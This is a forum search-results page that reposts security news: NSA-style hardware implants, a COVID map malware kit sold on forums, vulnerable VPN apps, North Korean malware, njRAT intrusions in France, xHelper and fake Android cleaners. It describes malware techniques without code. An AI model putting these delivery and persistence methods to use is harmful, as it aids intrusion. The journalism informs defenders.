Jump to content

Search the Community

Showing results for tags 'malware'.

More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Site Related
    • News & Updates
    • Site / Forum Feedback
    • Member Introduction
  • News
    • General News
    • FileSharing News
    • Mobile News
    • Software News
    • Security & Privacy News
    • Technology News
  • Downloads
    • nsane.down
  • General Discussions & Support
    • Filesharing Chat
    • Security & Privacy Center
    • Software Chat
    • Mobile Mania
    • Technology Talk
    • Entertainment Exchange
    • Guides & Tutorials
  • Off-Topic Chat
    • The Chat Bar
    • Jokes & Funny Stuff
    • Polling Station

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...

Found 150 results

  1. Today, one of the top priority dimensions of raising capabilities of cyberoperations is the creation of special hardware and software appliances and information technologies to carry out intelligence-gathering and offensive operations. It involves active development of so-called information weapons, a category that encompasses the whole range of means of attacking the adversary’s information resources. This type of attack mainly affects computer and telecommunications systems, including software, databases, computing and data processing, and also communications networks. Of particular importance is the establishment of dedicated offensive technologies that can be applied covertly against command and control infrastructure in order to disrupt the orderly functioning of their key components, and to seize control over them. Intellligence-gather cyber tools are intended to collect information about adversary, including structure, functioning, and vulnerabilities of its command systems. To achieve that, automated workstations will have malware inserted in order to establish a distributed, remotely controlled, intelligence gathering network. It may include thousands of computers in government and military facilities in various countries. The definition of malware includes external or internal programming code possessing various destructive functions, such as: destroying or changing software, destroying or corrupting data after a certain condition is met (“logic bombs”); exceeding the user’s authority in order to copy confidential information or to make such copying possible (“trojan horses”); corrupting protection systems or making it possible to bypass them; intercepting user login credentials through phishing or keystroke logging; intercepting data flowing within a distributed systems (monitors, sniffers); concealing one’s presence; self-replication, associating with other software and/or embedding own fragments into other operating or external memory not originally targeted by the malware; destroying or corrupting software code in operating memory; corruption, blocking, or supplanting data created by applications and entered into data links or external memory. Overall, there are three main types of destructive functions that may be performed by malware: Preserving or collection of fragments of data created by user, applications, uploading and downloading data, in external memory (local or remote) in the net or a stand-alone computer, including passwords, keys, and other access credentials, confidential documents in electronic form, or simply general corruption of fragments of sensitive data; Changing application algorithms (deliberate action against external or operating memory), in order to change the basic logic of their functioning; imposing a specific work regime or changing data being recorded by data produced by malware. Overall, the use of malware assumes the existence of an internal distribution mechanism to spread it to global or local networks, including the internet, to carry out specific tasks. These may include: penetrating remote computers to completely or partially seize control; launching own copies of malware on the infected computer; possible further penetration of all available networks. Such malware is mainly distributed as files attached to emails and electronic messages, and also through specially placed hyperlinks. This type of attack is distinguished by its scale and high speed of infection. Internet sites engaged in spreading malware increase by a factor of two every year. These sites attract attention of internet users by posting current informational content: news, analysis, overview of information technologies, and also commercial and entertainment articles. More than 20% of sites are specifically intended for malware distribution. Other means of using malware include: distributed denial of service (DDOS) attacks by generating intense traffic from false requests, which makes it impossible for actual users to gain access to the network or servers; dissemination of malware through USB memory devices, the most efficient means of doing so; embedding and activating code inserts. At the same time, many NATO countries have established military units for cyber-operations, and also pursue the development of scientific and technical infrastructure to develop special information technologies for offensive use, including self-multiplying and self-distributing malware, and developing doctrines for their use. Moreover, there is the so-called file-less (packet) malware distributed as net packets and penetrating computers through OS vulnerabilities or security holes in applications. In order to embed malware remotely, one can use social engineering or weaknesses in organizational network administration, such as unprotected local disks. The most widespread means of embedding malware is the Internet. Offensive malware targets both individual computers and networks. It accomplishes penetration using known and newly discovered weaknesses of both software and hardware developed by the potential adversary, but also in devices and programs developed by the world’s leading IT firms, most of which are based in the US. Other means of embedding malware are: agents, remote technical means including peripheral appliances of the system being attacked, combined attacks, etc. Malware developers focus on the ability to maintain stealthy presence amidst the target’s software and remain there even after an upgrade or software renewal. Main means of covert embedding of malware include: Pretending to be ordinary software. This approach assumes embedding malware using the process of installing a new application. It may be embedded in graphic or text editors, system utilities, screensaver, etc. Its existence is not concealed after installation; Pretending to be a module for expanding the computing environment. It’s a frequent variation on the previous one, and uses access to the ability to expand environments. For example, for Microsoft Windows OS such modules may include DLL modules and drivers, potentially containing malware; Malware replacing one of several application modules of the attacked environment. This method consists of choosing one or several modules for replacement with malware-infected modules in order to carry out the intended tasks. Such malware should externally be able to carry out the normal functions of the software thus targeted; Direct association. This method consists of associating malware with executable files of one or several legal programs in the system. This is the simplest method for single-task, single-user systems; Indirect association. It consists of associating malware with the code of a software module loaded into operating memory. In this instance the executable file remains unchanged, which makes malware detection harder. It’s also necessary to ensure the installable part of the virus already is present in the system. The most potentially useful means of embedding malware, not including through global networks, in order to gain covert access to enemy networks are: IRATEMONK allows embedding of malware in order to conduct surveillance on desktop and portable computers through recording onto the hard-drive BIOS, giving it the ability to implement its code by replacing the MBR. It works on various types of hard drives, including Western Digital, Seagate, Maxtor, and Samsung. It supports FAT, NTFS, EXT3, and UFS file systems, but systems with RAID are not. After embedding, IRATEMONK launches its payload every time the target computer is turned on. SWAP allows embedding malware for espionage by using motherboard BIOS and HPA domain of the hard drive by running the OC launch code. This program allows remote access to various operating systems (Windows, FreeBSD, Linux, Solans) with various file systems (FAT32, NTFS, EXT2, EXT3, UFS 1.0). Two utilities are used for installation: ARKSTREAM (it spoofs the BIOS) and TWISTEDKILT (it writes SWAP protocol and the malware payload to the HPA area of hard drive, and is used mainly against cell phones). COTTONMOUTH is a USB device insert providing a wireless bridge to the target network and also for loading exploits to the target system. It may open a covert channel to send commands and data. Built-in radio transmitter allows it to collaborate with other COTTONMOUTH. It’s based on TRINITY component base, with HOWLERMONKEY used as the transmitter. There’s also a version called MOCCASIN, which is inserted into a USB keyboard’s commutation matrix. FIREWALK is an insert used to passively collect Gigabit Ethernet traffic, and to embed malware into Ethernet packets. It can create a VPN tunnel between the targeted network and the center. It’s possible to establish wireless communications with other HOWLERMONKEY-compatible devices. This insert is similar in execution to COTTONMOUTH. It uses TRINITY component base, and HOWLERMONKEY as transmitter. NIGHTSTAND is a mobile system for active attacks on Wi-Fi nets, with the target being Windows machines when direct access is not possible. The system is based on a notebook-type portable computer running Linux and equipped with radio communications. External amplifiers and antennas give it range of up to 13km. DEITYBOUNCE delivers programming access to Dell PowerEdge servers with the help of motherboard BIOS and the use of the SMM regime to obtain the ability to launch itself before the system is launched. After set-up, it will run every time the system is switched on. FEEDTROUGH is equipment for installing two types of malware, BANANAGLEE and ZESTYLEAK, used to overcome network firewalls. This method is used when the firewall is launch. Malware’s installation is performed if operating system is present in the database, otherwise it is installed normally. FEEDTROUGH remains in place when the firewall operating system is updated. CTX4000 is a portable continuous emitter. It is used to obtain data from inserts installed on targeted systems. NIGHTWATCH is a PC-based system, used to process signals from the targeted monitor. Signals may be obtained using data collection systems (inserts in fiberoptic cables) or from a general purpose receiver. HOWLERMONKEY is a short- and medium-range radio transmitter. It is a special radio module for other inserts. It is used to collect data from inserts and enabling remote access to it. Moreover, there are other methods of embedding malware, through transceivers installed in USB cables or devices, through Wi-Fi, Bluetooth, GSM devices and cables attached to the targeted computer. One of the promising methods of remote malware placement is the unmanned aerial vehicle (UAV). USAF specialists have developed the WASP (Wireless Aerial Surveillance Platform) UAV on the basis of the FMQ-117B aerial target. It’s main mission are reconnaissance cyberoperations. Thanks to its onboard equipment, it may break into detected Wi-Fi networks, intercept cell phone conversations. WASP equipment includes HD-resolution camera, 11 antennas for various radio communications, GPS receiver, and onboard computer running Linux. Its memory contains a malware arsenal to break into wireless networks and a dictionary with 340 thousand words for “brute force” attacks. Obtained data and intercepted conversations are recorded in the onboard computer memory (solid-state hard drive with 500 GB memory) and may also be sent using internet channels to a special server using 3G and 4G networks, or the compromised Wi-Fi hot-spots. The UAV’s GPS allows it to operate autonomously along an assigned route, but it needs operator’s involvement for take-off and landing. Each system costs about $6 thousand, not including the cost of the UAV. Similar efforts are underway by US Army Cyber Command in order to interfere with automated command points at tactical and operational levels. The Sun Eagle tactical reconnaissance UAV is being used to test equipment for remote malware insertion into Wi-Fi and LTE wireless networks. Overall, United States and NATO are developing various methods and means for remote malware insertion. They include various physical data processing and transmission, and also different environments for proliferation. Countering such types of cyber weapons is a difficult and complex task, demanding considerable research efforts and financial expenditures.
  2. Live Coronavirus Map Used to Spread Malware Cybercriminals constantly latch on to news items that captivate the public’s attention, but usually they do so by sensationalizing the topic or spreading misinformation about it. Recently, however, cybercrooks have started disseminating real-time, accurate information about global infection rates tied to the Coronavirus/COVID-19 pandemic in a bid to infect computers with malicious software. A recent snapshot of the Johns Hopkins Coronavirus data map, available at coronavirus.jhu.edu. In one scheme, an interactive dashboard of Coronavirus infections and deaths produced by Johns Hopkins University is being used in malicious Web sites (and possibly spam emails) to spread password-stealing malware. Late last month, a member of several Russian language cybercrime forums began selling a digital Coronavirus infection kit that uses the Hopkins interactive map as part of a Java-based malware deployment scheme. The kit costs $200 if the buyer already has a Java code signing certificate, and $700 if the buyer wishes to just use the seller’s certificate. “It loads [a] fully working online map of Corona Virus infected areas and other data,” the seller explains. “Map is resizable, interactive, and has real time data from World Health Organization and other sources. Users will think that PreLoader is actually a map, so they will open it and will spread it to their friends and it goes viral!” The sales thread claims the customer’s payload can be bundled with the Java-based map into a filename that most Webmail providers allow in sent messages. The seller claims in a demonstration video that Gmail also allows it, but the video shows Gmail still warns recipients that downloading the specific file type in question (obscured in the video) can be harmful. The seller says the user/victim has to have Java installed for the map and exploit to work, but that it will work even on fully patched versions of Java. “Loader loads .jar files which has real working interactive Coronavirus realtime data map and a payload (can be a separate loader),” the seller said in the video. “Loader can predownload only map and payload will be loaded after the map is launched to show map faster to users. Or vice versa payload can be predownloaded and launched first.” It’s unclear how many takers this seller has had, but earlier this week security experts began warning of new malicious Web sites being stood up that used interactive versions of the same map to distract visitors while the sites tried to foist the password-stealing AZORult malware. As long as this pandemic remains front-page news, malware purveyors will continue to use it as lures to snare the unwary. Keep your guard up, and avoid opening attachments sent unbidden in emails — even if they appear to come from someone you know. A tip of the hat to @holdsecurity for a heads up about this malware offering. Source: Live Coronavirus Map Used to Spread Malware (KrebsOnSecurity - Brian Krebs)
  3. Major vulnerabilities found in top free VPN apps on Google Play store SuperVPN Free VPN Client is one of the most popular free VPN apps you can find on the Google Play store, having gained more than 100 million installs already. But besides being a very popular app, there’s something else you need to know about this free VPN: SuperVPN Free VPN Client is also very dangerous. You see, our analysis shows that this app has critical vulnerabilities that opens it up to dangerous attacks known as man-in-the-middle (MITM) hacks. These vulnerabilities will allow hackers to easily intercept all the communications between the user and the VPN provider, letting the hackers see everything the user is doing. This is actually quite the opposite of what a VPN is supposed to do. A VPN is supposed to keep your online activities private and secure from all snooping eyes. In fact, a VPN is supposed to be so safe that, even if a hacker could intercept these communications, it would take them longer than the age of the universe to even begin to decrypt the data. But that’s not what SuperVPN has done here. The implications here are pretty dire. Based on our research, more than 105 million people could right now be having their credit card details stolen, their private photos and videos leaked or sold online, every single minute of their private conversations recorded and sent to a server in a secret location. They could be browsing a fake, malicious website set up by the hacker and aided by these dangerous VPN apps. But what’s even worse is that this app isn’t alone: of the top VPN apps we analyzed, 10 free VPN apps have similar critical vulnerabilities. If you’ve installed any of these dangerous VPN apps, you should delete them immediately: Vulnerable VPN apps on Google Play Store About this research In order to undertake our analysis, we first developed a proof of concept for creating a man-in-the-middle (MITM) attack. We then looked at the top apps in Google Play that were returned when searching for the keyword “vpn” in January 2019. We first attempted our MITM attack on two top-10 VPNs – SuperVPN and Best Ultimate VPN – and then filtered and tested the remaining apps. We disclosed these vulnerabilities to all 10 affected VPN apps in October 2019 and provided them with enough time to fix these issues. Unfortunately, only one of them, Best Ultimate VPN, answered and ultimately patched their app based on the information we provided within this 90-day period. The others did not respond to our queries. We’ve also reported these vulnerabilities to Google, but so far haven’t heard anything back from them yet. Key takeaways 10 of the top free VPN apps in the Google Play store have significant vulnerabilities, affecting nearly 120 million users These vulnerabilities allow hackers to easily intercept user communications, including seeing the visited websites and stealing usernames and passwords, photos, videos, and messages 2 apps use hard-coded cryptographic keys, and 10 apps are missing encryption of sensitive data. 2 of these apps suffer from both vulnerabilities. One app was already identified as malware, but never removed from the Play store, gaining 100 million installs in the meantime. In earlier research, we identified this app for potentially manipulating Google Play in order to rank highly and get more installs 4 of the affected apps are located in Hong Kong, Taiwan or mainland China Some apps have their encryption keys hard-coded within the app. This means that, even if the data is encrypted, hackers can easily decrypt this data with the included keys Because of the vulnerabilities, hackers can easily force users to connect to their own malicious VPN servers Let’s take an in-depth look at one app to show what kind of vulnerabilities we found. SuperVPN putting 100 million users at risk SuperVPN is a highly popular Android VPN that was in position 5 for the “vpn” keyword at the time of our analysis. According to Google Play, the app has been downloaded more than 100 million times (in January 2019 it only had 50 million installs): SuperVPN app installs Just to show you how big of a number that is for any VPN, this is the same number of installs for much more popular apps like Tinder and AliExpress: Tinder app installs AliExpress app installs What we did In our tests, we noticed that SuperVPN connects with multiple hosts, with some communications being sent via unsecured HTTP. This communication contained encrypted data. But after more digging, we found that this communication actually contained the key needed to decrypt the information. What we found After decrypting the data, we found sensitive information about SuperVPN’s server, its certificates, and the credentials that the VPN server needs for authentication. Once we had this information, we replaced the real SuperVPN server data with our own fake server data. Who is behind SuperVPN? SuperVPN and its developer SuperSoftTech have been in our sights before. Our previous research analyzed the few companies secretly behind many VPN products. From that, we know that SuperSoftTech claims to be based in Singapore, but it actually belongs to the independent app publisher Jinrong Zheng, a Chinese national likely based in Beijing. We also discovered that SuperVPN had been called out before in a 2016 Australian research article as being the third-most malware-rigged VPN app. This is only one example of vulnerabilities we found in all 10 apps listed in this article. A reputation for manipulation SuperVPN was discussed before in our earlier research on the potential manipulation tactics the top VPNs were using to seemingly rank higher in Google Play results. In that research, we discovered that the top 10 results for the “vpn” keyword in Google Play were all free VPNs. They were ranking more highly than market leader VPNs, such as NordVPN and ExpressVPN. Our research discovered that these better-ranked apps seemed to be using three easy manipulation techniques to get such high rankings. That means that SuperVPN by SuperSoftTech seems to not only be using manipulation techniques to rank highly in Google Play, but is also dangerously vulnerable. We attempted to contact Mr. Zheng on multiple occasions, but we have not heard back from him. How MITM hackers penetrate VPN apps In order to really understand how critical and dangerous these vulnerabilities are, you have to understand a little of how users normally connect to VPNs. The exact process for VPNs can seem a bit complicated, but the connection is pretty simple. Now, with a hacked VPN connection, there’s a MITM hacker who positioned himself right in the middle of your app and the VPN’s backend server: And this is the dangerous part: by changing the details, he can now force you to connect to his malicious server instead of the real VPN server. While everything will appear to work normally, and you think that you’re being extra safe and secure, you’re actually being seriously exposed. In total, your personal life is exposed, and it’s only limited by the hacker’s imagination what he can do with all that data. What this means for your safety This is a disastrous finding on two levels. In the broader sense, it’s disastrous that any app that participates in user data would have these wide-open vulnerabilities that make it particularly easy for hackers and government agencies to monitor user communications. In a more specific, and more dangerous, sense, it’s disastrous that a VPN would have these vulnerabilities. After all, users are connecting to VPNs in order to increase their privacy and security. For that reason, they’re more willing to transmit sensitive information on VPN apps than on other apps. For a VPN app to then be so vulnerable is a betrayal of users’ trust and puts them in a worse position than if they hadn’t used any VPN at all. However, there could be something larger at play here. When looking at these apps together, there seem to be two essential possibilities: These core vulnerabilities are intentional for these free VPN apps. After all, since a successful MITM attack would allow someone the ability to monitor sensitive user data (or reroute users to fake VPN servers) without the user’s knowledge, that’s a useful tool for any surveillance-hungry organization or nation. On the other hand, we should probably not attribute to malice what can be explained by stupidity – or here, laziness. In simple terms, the app developers here are so focused on getting high amounts of users and stuffing their app with ads, that they placed lower priority on the core security features of their apps. While one possibility may seem worse than another, at some point only the result matters: people using these vulnerable apps are putting their data – and possibly their lives – in danger. Based on that essential fact alone, we highly recommend users avoid these vulnerable VPN apps at all costs. When looking for an effective VPN, we recommend users do their due diligence. Ask yourself the following questions: Do I know this VPN developer or brand? Do they seem trustworthy? Where is the VPN located? Is it in a privacy-friendly country? For mobile apps, what permissions are they requiring? Do they actually need those permissions to function (such as the camera, GPS, microphone)? Free is great – but can you trust this VPN? There are a few commendable free VPNs or VPNs with free options from reputable brands. Taking an active role in filtering out the good VPNs from the bad ones will save users a lot of trouble later on. Source
  4. US government goes all in to expose new malware used by North Korean hackers The US Pentagon, the FBI, and the Department of Homeland Security on Friday exposed a North Korean hacking operation and provided technical details for seven pieces of malware used in the campaign. The US Cyber National Mission Force, an arm of the Pentagon’s US Cyber Command, said on Twitter that the malware is “currently used for phishing & remote access by [North Korean government] cyber actors to conduct illegal activity, steal funds & evade sanctions.” The tweet linked to a post on VirusTotal, the Alphabet-owned malware repository, that provided cryptographic hashes, file names, and other technical details that can help defenders identify compromises inside the networks they protect. An accompanying advisory from the DHS’s Cybersecurity and Infrastructure Security Agency said the campaign was the work of Hidden Cobra, the government’s name for a hacking group sponsored by the North Korean Government. Many security researchers in the private sector use other names for the group, including Lazarus and Zinc. Six of the seven malware families were uploaded to VirusTotal on Friday. They included: Bistromath, a full-featured remote access trojan and implant that performs system surveys, file uploads and downloads, process and command executions, and monitoring of microphones, clipboards, and screens Slickshoes, a “dropper” that loads, but doesn’t actually execute, a “beaconing implant” that can do many of the same things Bistromath does Hotcroissant, a full-featured beaconing implant that also does many of the same things listed above Artfulpie, an “implant that performs downloading and in-memory loading and execution of DLL files from a hardcoded url” Buttetline, another full-featured implant, but this one uses fake a fake HTTPS scheme with a modified RC4 encryption cipher to remain stealthy Crowdedflounder, a Windows executable that’s designed to unpack and execute a Remote Access Trojan into computer memory But wait... there’s more Friday’s advisory from the Cybersecurity and Infrastructure Security Agency also provided additional details for the previously disclosed Hoplight, a family of 20 files that act as a proxy-based backdoor. None of the malware contained forged digital signatures, a technique that’s standard among more advanced hacking operations that makes it easier to bypass endpoint security protections. Costin Raiu, director of the Global Research and Analysis Team at Kaspersky Lab, posted an image on Twitter that showed the relationship between the malware detailed on Friday with malicious samples the Moscow-based security firm has identified in other campaigns attributed to Lazarus. Friday’s joint advisory is part of a relatively new approach by the federal government to publicly identify foreign-based hackers and the campaigns they carry out. Previously, government officials mostly steered clear of attributing specific hacking activities to specific governments. In 2014, that approach began to change when the FBI publicly concluded that the North Korean government was behind the highly destructive hack of Sony Pictures a year earlier. In 2018, the Department of Justice indicted a North Korean agent for allegedly carrying out the Sony hack and unleashing the WannaCry ransomware worm that shut down computers worldwide in 2017. Last year, the US Treasury sanctioned three North Korean hacking groups widely accused of attacks that targeted critical infrastructure and stole millions of dollars from banks in cryptocurrency exchanges. As Cyberscoop pointed out, Friday marked the first time that the US Cyber Command identified a North Korean hacking operation. One reason for the change: although the North Korean government hackers often use less advanced malware and techniques than counterparts from other countries, the attacks are growing increasingly sophisticated. News agencies including Reuters have cited a United Nations report from last August that estimated North Korean hacking of banks and cryptocurrency exchanges has generated $2 billion for the country’s weapons of mass destruction programs. Source
  5. French Firms Rocked by Kasbah Hacker? A large number of French critical infrastructure firms were hacked as part of an extended malware campaign that appears to have been orchestrated by at least one attacker based in Morocco, KrebsOnSecurity has learned. An individual thought to be involved has earned accolades from the likes of Apple, Dell, and Microsoft for helping to find and fix security vulnerabilities in their products. In 2018, security intelligence firm HYAS discovered a malware network communicating with systems inside of a French national power company. The malware was identified as a version of the remote access trojan (RAT) known as njRAT, which has been used against millions of targets globally with a focus on victims in the Middle East. Further investigation revealed the electricity provider was just one of many French critical infrastructure firms that had systems beaconing home to the malware network’s control center. Other victims included one of France’s largest hospital systems; a French automobile manufacturer; a major French bank; companies that work with or manage networks for French postal and transportation systems; a domestic firm that operates a number of airports in France; a state-owned railway company; and multiple nuclear research facilities. HYAS said it quickly notified the French national computer emergency team and the FBI about its findings, which pointed to a dynamic domain name system (DNS) provider on which the purveyors of this attack campaign relied for their various malware servers. When it didn’t hear from French authorities after almost a week, HYAS asked the dynamic DNS provider to “sinkhole” the malware network’s control servers. Sinkholing is a practice by which researchers assume control over a malware network’s domains, redirecting any traffic flowing to those systems to a server the researchers control. While sinkholing doesn’t clean up infected systems, it can prevent the attackers from continuing to harvest data from infected PCs or sending them new commands and malware updates. HYAS found that despite its notifications to the French authorities, some of the apparently infected systems were still attempting to contact the sinkholed control networks up until late 2019. “Due to our remote visibility it is impossible for us to determine if the malware infections have been contained within the [affected] organizations,” HYAS wrote in a report summarizing their findings. “It is possible that an infected computer is beaconing, but is unable to egress to the command and control due to outbound firewall restrictions.” About the only French critical infrastructure vertical not touched by the Kasbah hackers was the water management sector. HYAS said given the entities compromised — and that only a handful of known compromises occurred outside of France — there’s a strong possibility this was the result of an orchestrated phishing campaign targeting French infrastructure firms. It also concluded the domains associated with this campaign were very likely controlled by a group of adversaries based in Morocco. “What caught our attention was the nature of the victims and the fact that there were no other observed compromises outside of France,” said Sasha Angus, vice president of intelligence for HYAS. “With the exception of water management, when looking at the organizations involved, each fell within one of the verticals in France’s critical infrastructure strategic plan. While we couldn’t rule out financial crime as the actor’s potential motive, it didn’t appear that the actor leveraged any normal financial crime tools.” ‘FATAL’ ERROR HYAS said the dynamic DNS provider shared information showing that one of the email addresses used to register a key DNS server for the malware network was tied to a domain for a legitimate business based in Morocco. According to historic records maintained by Domaintools.com [an advertiser on this site], that email address — [email protected] — was used in 2016 to register the Web site talainine.com, a now-defunct business that offered recreational vehicle-based camping excursions just outside of a city in southern Morocco called Guelmim. Archived copies of talainine.com indicate the business was managed by two individuals, including someone named Yassine Algangaf. A Google search for that name reveals a similarly named individual has been credited by a number of major software companies — including Apple, Dell and Microsoft — with reporting security vulnerabilities in their products. A search on this name at Facebook turned up a page for another now-defunct business called Yamosoft.com that lists Algangaf as an owner. A cached copy of Yamosoft.com at archive.org says it was a Moroccan computer security service that specialized in security audits, computer hacking investigations, penetration testing and source code review. A search on the [email protected] address at 4iq.com — a service that indexes account details like usernames and passwords exposed in Web site data breaches — shows this email address was used to register an account at the computer hacking forum cracked[.]to for a user named “fatal.001.” A LinkedIn profile for a Yassine Algangaf says he’s a penetration tester from the Guelmim province of Morocco. Yet another LinkedIn profile under the same name and location says he is a freelance programmer and penetration tester. Both profiles include the phrase “attack prevention mechanisms researcher security tools proof of concepts developer” in the description of the user’s job experience. Searching for this phrase in Google turns up another Facebook page, this time for a “Yassine Majidi,” under the profile name “FatalW01.” A review of Majidi’s Facebook profile shows that phrase as his tag line, and that he has signed several of his posts over the years as “Fatal.001.” There are also two different Skype accounts registered to the ing.equipepro.com email address, one for Yassine Majidi and another for Yassine Algangaf. There is a third Skype account nicknamed “Fatal.001” that is tied to the same phone number included on talainine.com as a contact number for Yassine Algangaf (+212611604438). A video on Majidi’s Facebook page shows him logged in to the “Fatal.001” Skype account. On his Facebook profile, Majidi includes screen shots of several emails from software companies thanking him for reporting vulnerabilities in their products. Fatal.001 was an active member on dev-point[.]com, an Arabic-language computer hacking forum. Throughout multiple posts, Fatal.001 discusses his work in developing spam tools and RAT malware. In this two-hour Arabic language YouTube tutorial from 2014, Fatal.001 explains how to use a RAT he developed called “Little Boy” to steal credit card numbers and passwords from victims. The main control screen for the Little Boy botnet interface includes a map of Morocco. Reached via LinkedIn, Algangaf confirmed he used the pseudonyms Majidi and Fatal.001 for his security research and bug hunting. But he denied ever participating in illegal hacking activities. He acknowledged that [email protected] is his email address, but claims the email account was hacked at some point in 2017. “It has already been hacked and recovered after a certain period,” Algangaf said. “Since I am a security researcher, I publish from time to time a set of blogs aimed at raising awareness of potential security risks.” As for the notion that he has somehow been developing hacking programs for years, Algangaf says this, also, is untrue. He said he never sold any copies of the Little Boy botnet, and that this was one of several tools he created for raising awareness. “In 2013, I developed a platform for security research through which penetration test can be done for phones and computers,” Algangaf said. “It contained concepts that could benefit from a controlled domain. As for the fact that unlawful attacks were carried out on others, it is impossible because I simply have no interest in blackhat [activities].” Source: French Firms Rocked by Kasbah Hacker? (KrebsOnSecurity - Brian Krebs)
  6. Nasty Android malware reinfects its targets, and no one knows how Users report that xHelper is so resilient it survives factory resets. Enlarge A widely circulating piece of Android malware primarily targeting US-based phones used a clever trick to reinfect one of its targets in a feat that stumped researchers as to precisely how it was pulled off. xHelper came to light last May when a researcher from security firm Malwarebytes published this brief profile. Three months later, Malwarebytes provided a deeper analysis after the company’s Android antivirus app detected xHelper on 33,000 devices mostly located in the US, making the malware one of the top Android threats. The encryption and heavy obfuscation made analysis hard, but Malwarebytes researchers ultimately concluded that the main purpose of the malware was to act as a backdoor that could remotely receive commands and install other apps. On Wednesday, Malwarebytes published a new post that recounted the lengths one Android user took to rid her device of the malicious app. In short, every time she removed two xHelper variants from the device, the malware would reappear on her device within the hour. She reported that even performing a factory reset wasn't enough to make the malware go away. Blind alleys Company researchers initially suspected that pre-installed malware was the culprit. They eventually dropped that theory after the user performed a technique that prevented system apps from running. Malwarebytes analysts later saw the malware indicating that Google Play was the source of the reinfections, but they ruled out this possibility after further investigation. Eventually (and with the help of the Android user), company researchers finally identified the source of the reinfections: several folders on the phone that contained files that, when executed, installed xHelper. All of the folders began with the string com.mufc. To the researchers’ surprise, these folders weren’t removed even though the user performed a factory reset on the device. “This is by far the nastiest infection I have encountered as a mobile malware researcher,” Malwarebytes’ Nathan Collier wrote in Wednesday’s post. “Usually a factory reset, which is the last option, resolves even the worst infection. I cannot recall a time that an infection persisted after a factory reset unless the device came with pre-installed malware.” Malwarebytes Hidden inside a directory named com.mufc.umbtts was an Android application package, or APK, that dropped an xHelper variant. The variant, in turn, dropped more malware within seconds. And with that, xHelper once again menaced the user’s device. The user finally rid her device of the malware after using an Android file manager to delete the mufc folders and all their contents. Because the malware was somehow identifying Google Play as the source of the reinfection, Collier recommends people in a similar position disable the Google Play Store app before removing the folders. Collier still isn’t sure how the mufc folders came to reside on the phone in the first place or why they weren’t deleted during factory reset. In October, security firm Symantec also reported that users were complaining that factory resets didn’t kill xHelper, but company researchers were also unable to explain why. One theory, Collier said, is that an xHelper variant installed the folders and made them appear as an SD card that wasn’t affected by the factory reset (the user reported that her device didn’t have an SD card). “I was under the assumption that files/directories were removed after a factory reset, but this proves that some things can be left over,” Collier wrote in an email. “There are still a lot of unknowns with this one. We’re just glad to have a resolution for our customers who may be struggling with this infection.” Source: Nasty Android malware reinfects its targets, and no one knows how (Ars Technica)
  7. Gmail Is Catching More Malicious Attachments With Deep Learning Users of Gmail get 300 billion attachments each week. To separate legitimate documents from harmful ones, Google turned to AI—and it’s working. Photograph: Getty Images Distributing malware by attaching tainted documents to emails is one of the oldest tricks in the book. It's not just a theoretical risk—real attackers use malicious documents to infect targets all the time. So on top of its anti-spam and anti-phishing efforts, Gmail expanded its malware detection capabilities at the end of last year to include more tailored document monitoring. Good news, it's working. At the RSA security conference in San Francisco on Tuesday, Google's security and anti-abuse research lead Elie Bursztein will present findings on how the new deep-learning scanner for documents is faring against the 300 billion attachments it has to process each week. It's challenging to tell the difference between legitimate documents in all their infinite variations and those that have specifically been manipulated to conceal something dangerous. Google says that 63 percent of the malicious documents it blocks each day are different than the ones its systems flagged the day before. But this is exactly the type of pattern-recognition problem where deep learning can be helpful. Currently 56 percent of malware threats against Gmail users come from Microsoft Office documents, and 2 percent come from PDFs. In the months that it's been active, the new scanner has increased its daily malicious Office document detection by 10 percent. "Ten percent matters," Bursztein told WIRED. "We're trying to close the gap as much as possible. We want to keep adding machine learning everywhere we can, where it makes sense. Machine learning does amazing things sometimes, but sometimes it’s overhyped. We try to use it as an extra layer rather than the only layer. We think that works way better." The document analyzer looks for common red flags, probes files if they have components that may have been purposefully obfuscated, and does other checks like examining macros—the tool in Microsoft Word documents that chains commands together in a series and is often used in attacks. The volume of malicious documents that attackers send out varies widely day to day. Bursztein says that since its deployment, the document scanner has been particularly good at flagging suspicious documents sent in bursts by malicious botnets or through other mass distribution methods. He was also surprised to discover how effective the scanner is at analyzing Microsoft Excel documents, a complicated file format that can be difficult to assess. Though a 10 percent detection increase may not sound like a lot, it's a massive improvement at the scale Google is working on, and any gains are productive given that the threat of malicious documents is a real concern around the world. Bursztein says that companies and nonprofits are three times more likely to be targeted by malicious documents than other organizations, and that government entities are five times more likely. Some industries are more likely than others to be targeted, as well. Transportation and critical infrastructure utilities, for example, have a much higher risk than the education sector. The prevalence of malicious document attacks varies around the world, but for attackers the approach is always an option. Bursztein points out that kits for crafting malicious documents and tailoring them to evade antivirus scanners are readily available in online criminal forums, ranging in price from about $400 to $5,000. While the scanner is catching more malicious documents than ever, Bursztein and his colleagues will continue to refine it in the hopes of blocking an even bigger chunk of the malware sent to Gmail accounts worldwide. "Malware is something we did after spam and phishing, because malware is a bit harder," he says. "We don't have the malware itself in an email; the documents are all we have at that point. But we always want to improve our detection capabilities and with malicious documents we chose the one where we could make the most impact for our users." When a full-blown hack is just a rogue Word document download away, users will take whatever extra protections they can get. Source: Gmail Is Catching More Malicious Attachments With Deep Learning (Wired)
  8. These Crappy Android Cleaner Apps Are Actually Malware While the latest Android malware you should look out for hasn’t been as popular as the scammy apps that recently drove 382+ million downloads, it’s plenty serious. Security researchers from Trend Micro recently called out a number of Android apps—with more than 470,000 total downloads combined—for being bogus system-cleaning utilities that actually had the potential to install more than 3,000 other malware apps on a user’s device. Worse, these shitty apps could also log into these other shitty apps using your Facebook or Google credentials to help perpetuate advertising fraud (and likely get the malware’s creators a decent payout, until caught). As Trend Micro describes: "Based on our analysis, the 3,000 malware variants or malicious payloads (detected by Trend Micro as AndroidOS_BoostClicker.HRX) that can be possibly downloaded to an affected device with this campaign pretend to be system applications that do not show app icons on the device launcher or application list. The cybercriminals behind this campaign can use the affected device to post fake positive reviews in favor of the malicious apps, as well as perform multiple ad fraud techniques by clicking on the ads that pop up." Though odds are good that you haven’t been infected by the original apps or the malware they dump on your device, here’s a quick list of the apps you’d want to look out for (just in case): Shoot Clean-Junk Cleaner,Phone Booster,CPU Cooler Super Clean Lite- Booster, Clean&CPU Cooler Super Clean-Phone Booster,Junk Cleaner&CPU Cooler Quick Games-H5 Game Center Rocket Cleaner Rocket Cleaner Lite Speed Clean-Phone Booster,Junk Cleaner&App Manager LinkWorldVPN H5 gamebox What’s more important in this case is Trend Micro’s takeaways for avoiding shitty 